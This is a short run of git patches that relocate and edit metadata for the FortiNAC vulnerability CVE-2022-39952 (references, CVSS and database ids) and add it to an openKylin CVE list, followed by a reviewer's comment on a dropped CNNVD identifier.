a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml similarity index 100% rename from cve/fortinac/yaml/CVE-2022-39952.yaml rename to cve/fortinac/2022/yaml/CVE-2022-39952.yaml -- Gitee From 055e3a48b0c023cbf0bf2878015335aa8cbe5a5e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Wed, 15 Mar 2023 03:56:55 +0000 Subject: [PATCH 17/19] update cve/fortinac/2022/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/2022/yaml/CVE-2022-39952.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml index 8c4efdf1..98f30f02 100644 --- a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -19,10 +19,10 @@ info: - https://www.fortiguard.com/psirt/FG-IR-22-300 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 - cnnvd-id: CNNVD-202302-1434 + cnvd-id: None kve-id: None tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From 4b2da201b5770bd9e96cc569a5448e45a871c010 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Wed, 15 Mar 2023 07:28:35 +0000 Subject: [PATCH 18/19] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7..f488b496 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -51,6 +51,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + fortinac: + - CVE-2022-39952 cnvd: kve: kylin-software-properties: -- Gitee From e922beb80fa27d7c4cb297eabee1fa25755ae8ef Mon Sep 17 00:00:00 2001 
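Review bot: The `classification` change in PATCH 17 replaces `cnnvd-id: CNNVD-202302-1434` with `cnvd-id: None`, so restoring the key name also throws away a populated identifier. CNVD and CNNVD are separate databases; if the entry format permits an extra key, keeping `cnvd-id: None` and `cnnvd-id: CNNVD-202302-1434` together retains the cross-reference, and if it does not, a trailing comment `# CNNVD-202302-1434` would. Whether the format allows extra keys cannot be told from this patch.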
From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Wed, 15 Mar 2023 07:30:34 +0000 Subject: [PATCH 19/19] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- openkylin_list.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f488b496..8a5e20bd 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -51,7 +51,7 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 - fortinac: + fortinac: - CVE-2022-39952 cnvd: kve: -- Gitee